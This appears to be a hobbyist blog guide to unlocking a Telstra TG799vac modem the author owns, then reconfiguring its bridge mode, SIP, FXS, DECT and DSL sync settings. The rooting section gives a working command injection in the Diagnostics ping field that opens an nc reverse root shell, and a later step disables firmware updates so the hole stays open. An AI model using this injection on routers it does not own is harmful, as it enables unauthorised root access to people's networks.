The TG799vac, known more commonly in Australia as the “Telstra Gateway Max” is a very capable piece of equipment. It has 802.11ac, a VDSL / ADSL2 modem (meaning NBN FTTN compatibility), a DECT base station, 2 x FXS ports for analogue ports, and an FXO port.
They are provided directly to Telstra – and as such, has Telstra branded firmware. There is no ‘generic’ firmware available that will just give you access to the modem as any other device you would purchase. Personally, I think this kind of sucks – as if you decide to use this device with anyone other than Telstra, you lose access to the VoIP functionality, DECT base station, FXO ports. That was the motivation to crack into this device and re-enable as many features as possible.
By default, the IP address of the modem will be 10.0.0.138. In this example, I use a desktop on 10.0.0.122.
First, we have to exploit the web interface to get root access to the device. This can be done by a flaw in IPv6 address validation on the web site – which will allow the web server to run arbitrary code. This is good – otherwise none of the rest would be possible.
Getting root access
On your desktop, we want to open a listening port. Ensure that your firewall will allow this though.
# nc -lvvp 10001
Now visit the ‘Diagnostics’ page on the modem, and click on the Ping & Traceroute tab. In the IP address section, enter:
:::::::;nc 10.0.0.122 10001 -e /bin/sh
If your modem doesn’t display the Diagnostics tile, you can use firebug or something similar (F12 in Internet Explorer) inspect the DOM of the main page of the modem GUI with all the “tiles” on it and change one of the existing “tiles” in the GUI (such as “Management”)
<div class="settings" id="Management" data-remote="modals/usermgr-modal.lp" data-toggle="modal" data-id="usermgr-modal"></div>
<div class="settings" id="Diagnostics" data-remote="modals/diagnostics-xdsl-modal.lp" data-toggle="modal" data-id="diagnostics-xdsl-modal"></div>
Exit the DOM inspector and click on the “Management” tile as if you were entering the Management page. It should load the Diag page instead.
If all goes well, your modem will now connect to your desktop – and make available a root shell for you. NOTE: At this point, you won’t see any type of shell prompt, or error messages – so while you’ll get output of commands, it can get a little confusing.
First steps – change the root password, get dropbear (the SSH server) to run on boot – NOTE the lack of prompt:
Changing password for root
Password for root changed by root
echo 'dropbear &' > /etc/rc.local
You should now be able to SSH into your modem on on the LAN IP with the username root and password you set above.
$ ssh email@example.com firstname.lastname@example.org's password: BusyBox v1.23.2 (2017-02-08 14:47:26 UTC) built-in shell (ash) _______ __ __ __ |_ _|.-----.----.| |--.-----.|__|.----.-----.| |.-----.----. | | | -__| __|| | || || __| _ || || _ | _| |___| |_____|____||__|__|__|__||__||____|_____||__||_____|__| N E X T G E N E R A T I O N G A T E W A Y -------------------------------------------------------------------- NG GATEWAY SIGNATURE DRINK -------------------------------------------------------------------- * 1 oz Vodka Pour all ingredients into mixing * 1 oz Triple Sec tin with ice, strain into glass. * 1 oz Orange juice -------------------------------------------------------------------- Product: vant-f_telstra Release: Aqua (16.3) Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d Hash config: 887a8c777ed8527277d7137ed9149816c889cf1d Hash openwrt: ca2463af2522fc727150f23d6e85005112e8e8eb Hash kernel: b295f29cce441d87cef07373bfb07b546f720db3 Hash technicolor: 021884ac6200cd08635043046d33a717336a3554 Hash mindspeed: 91b6a7a4d703268d6023c3a58da3d33fc62e7ed8 Hash lte: cf5c1319d7769c1b9e7721dfebcfe25e8cc1176f Hash routing: 7b853f235ce96cd14f3abaebf9253c5ca7f72f7d Hash custo: 85da3def73fee4e92f478d2b1afafdfc16235a81 Hash packages: 0f8aa1264d7a3bf6e4304f0f8ddfdabc4ddac7e4 Bootloader: 2.0.54 root@mygateway:~#
You’ll note straight away that the firmware is based on OpenWRT. This is always good – as it means that the majority of the OpenWRT configuration is applicable directly to this modem.
Disable software updates
A reader has written to advise that the exploit we have used to get access to the modem is fixed in release 17.1. To prevent your modem from auto-upgrading, I suggest commenting out the following lines in /etc/config/cwmpd as follows:
option upgradesmanaged '0' #option acs_url 'https://xxxxxxxxxx'
I also recommend disabling the service:
# /etc/init.d/cwmpd stop # /etc/init.d/cwmpd disable # /etc/init.d/cwmpdboot disable
Using bridge mode with dedicated PPPoE ethernet port
I use the AP on the device on my LAN – but I also use the modem purely in bridge mode – which means I want to dedicate a port to my router to allow it to do PPPoE to my ISP. Thankfully – standard OpenWRT config applies. I added a new bridge called ‘adsl_wan’ and added eth4, eth3, atm_8_35 and ptm0 to it:
config interface 'adsl_wan' option type 'bridge' option ip6hint '0' option force_link '0' list ifname 'eth4' list ifname 'eth3' list ifname 'atm_8_35' list ifname 'ptm0'
You’ll need to remove eth3 from the LAN vlan. This gives you the port right next to the WAN ethernet (which is eth3 – eth4 is the WAN port) on the same bridge as the VDSL/ADSL modem. I have yet to figure out how to get the WAN port to do this – as it seems to be configured differently – maybe at the switch level.
Enable web interface features
If you have the modem in bridge mode, the web interface is gutted compared to in routed mode.
Edit /www/lua/cards_limiter.lua and change the following function to:
function M.card_limited(info, cardname) ## Display all cards. return false if info.bridged then return not bridge_limit_list[cardname] end return false end
Restart the web interface via: /etc/init.d/nginx restart
Configure a third party SIP provider
Edit /etc/config/mmpbxrvsipnet and use the following guide:
Under the heading sip_net, set:
Under the heading sip_profile_0, set:
Restart the mmpbxd service via /etc/init.d/mmpbxd restart
If you have multiple SIP accounts to log into – and with different providers, you can duplicate the entire sip_net section under a different name and configure as per above. Set the profile network setting to point to the new section you have created.
Enable the FXS ports
To enable the FXS ports, set the relay_state parameter to ‘1’ in /etc/config/mmpbxbrcmfxsdev – eg for FXS port 2:
config device 'fxs_dev_0' option user_friendly_name 'Phone 1' option comfort_noise 'silence' option echo_cancellation '1' option fax_transport 'inband_renegotiation' option t38_redundancy '1' option rtcp_interval '5000' #list codec_black_list 'G722' #list codec_black_list 'AMR-WB' option cw_cas_delay '758' option fxs_privacy_reason 'P' option fxs_unavailability_reason 'O' option fxs_port '2' option cid_display_date_enabled '1' option cid_display_calling_line_enabled '1' option cid_display_calling_party_name_enabled '1' option pos '0' option early_detect_faxmodem '0' option relay_state '1'
SIP call routing
Each DECT device or FXS port can be registered against one or multiple SIP accounts. Look for the incoming_map section against sip_profile_0 and edit as needed. This is my setup to route sip_profile_1 to the first registered DECT device – and FXS port 1:
config incoming_map option profile 'sip_profile_0' list device 'fxs_dev_0' list device 'dect_dev_1' list device 'dect_dev_2' list device 'dect_dev_3' list device 'dect_dev_4' list device 'dect_dev_5' list device 'sip_dev_0' list device 'sip_dev_1' list device 'sip_dev_2' list device 'sip_dev_3' list device 'sip_dev_4' list device 'sip_dev_5' list device 'sip_dev_6' config incoming_map option profile 'sip_profile_1' list device 'dect_dev_0' list device 'fxs_dev_1'
Registering DECT handsets
After enabling all the ‘cards’ via the web interface, the easy way is to start DECT paring via the web interface. Click on the Telephony card, then ‘Start’ the paring and follow the instructions for your handset. This was straight forward for me.
Speeding up sync times
If you are on an NBN FTTN connection, it seems the modem still tries to sync using ADSL first. The default NBN FTTN profile is 17a – so we can disable other modes in /etc/config/xdsl:
config xdsl 'dsl0' #list multimode 'gdmt' #list multimode 'adsl2annexm' #list multimode 'adsl2plus' list multimode 'vdsl2' #list profile '8a' #list profile '8b' #list profile '8c' #list profile '8d' #list profile '12a' #list profile '12b' list profile '17a' option enabled '1' option eoc_vendor_id 'BETMMB' option handshake_switch_timeout '0' option demod_cap_value '0x90447a' option demod_cap_mask '0x90447a' option demod_cap2_value '0x790000' option demod_cap2_mask '0x790000' option aux_features_value '0x1064003' option aux_features_mask '0x1064003' option vdsl_cfg_flags_value '0x1200e00' option vdsl_cfg_flags_mask '0x1200000' option xdsl_cfg1_value '0x0' option xdsl_cfg1_mask '0x0' option xdsl_cfg2_value '0x0' option xdsl_cfg2_mask '0x0' option maxaggrdatarate '160000' option maxdsdatarate '110000' option maxusdatarate '40000' option eoc_serial_number 'YeahRight 799vac 16.3'
Changing max sync speeds
In /etc/config/xdsl, you can change the max values for sync speeds. The value maxusdatarate controls the upstream maximum sync speed, maxdsdatarate controls the downstream maximum sync speed, and maxaggrdatarate is the maximum combined speed. The defaults are listed above. This doesn’t change any limitations imposed by line length – or at the DSLAM.
A serial console can be added using a 3.3v to RS232 adapter. These can be found on ebay quite cheaply. The serial console is J5 on the board, and note from the picture below, R327 and R328 need to be solder bridged to pass the serial signals to the adaptor. In the pictures shown, Black = Ground, Yellow = RX, and Green = TX.
2017-09-02 – Initial revision of this document.
2017-09-07 – Add section to disable cwmpd to prevent pushed firmware updates locking us out.
2017-10-20 – Add workaround for diagnostics tile thanks to NetSicK
2017-11-20 – Add serial console details thanks to Matt.